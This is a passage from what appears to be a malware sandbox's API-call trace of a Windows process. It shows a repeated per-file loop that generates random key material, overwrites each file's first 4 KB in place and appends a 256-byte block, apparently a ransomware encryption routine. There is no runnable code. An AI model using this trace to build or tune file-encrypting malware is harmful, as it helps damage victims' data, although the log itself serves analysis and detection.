hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.796] GetProcessHeap () returned 0x4f10000 [0082.796] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.796] CloseHandle (hObject=0x8e0) returned 1 [0082.797] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 89 [0082.797] SetFilePointerEx (in: hFile=0x8e4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.797] ReadFile (in: hFile=0x8e4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.797] SetFilePointerEx (in: hFile=0x8e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.798] GetProcessHeap () returned 0x4f10000 [0082.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.798] GetProcessHeap () returned 0x4f10000 [0082.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.798] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.798] GetProcessHeap () returned 0x4f10000 [0082.798] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.798] ReadFile (in: hFile=0x8e4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.847] SetFilePointerEx (in: hFile=0x8e4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.847] WriteFile (in: hFile=0x8e4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.847] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.847] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.848] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.848] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.849] GetProcessHeap () returned 0x4f10000 [0082.849] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.850] GetProcessHeap () returned 0x4f10000 [0082.850] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.851] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.851] SetFilePointerEx (in: hFile=0x8e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.851] WriteFile (in: hFile=0x8e4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.851] WriteFile (in: hFile=0x8e4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.851] GetProcessHeap () returned 0x4f10000 [0082.852] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.852] GetProcessHeap () returned 0x4f10000 [0082.852] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.852] GetProcessHeap () returned 0x4f10000 [0082.852] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.852] CloseHandle (hObject=0x8e4) returned 1 [0082.853] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 90 [0082.853] SetFilePointerEx (in: hFile=0x8e8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.853] ReadFile (in: hFile=0x8e8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.853] SetFilePointerEx (in: hFile=0x8e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.853] GetProcessHeap () returned 0x4f10000 [0082.853] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.854] GetProcessHeap () returned 0x4f10000 [0082.854] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.854] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.854] GetProcessHeap () returned 0x4f10000 [0082.854] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.854] ReadFile (in: hFile=0x8e8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.901] SetFilePointerEx (in: hFile=0x8e8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.901] WriteFile (in: hFile=0x8e8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.901] GetProcessHeap () returned 0x4f10000 [0082.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.901] GetProcessHeap () returned 0x4f10000 [0082.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.901] GetProcessHeap () returned 0x4f10000 [0082.901] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.901] GetProcessHeap () returned 0x4f10000 [0082.901] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.901] GetProcessHeap () returned 0x4f10000 [0082.902] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.902] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.902] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.903] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.903] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.904] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.904] GetProcessHeap () returned 0x4f10000 [0082.905] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, 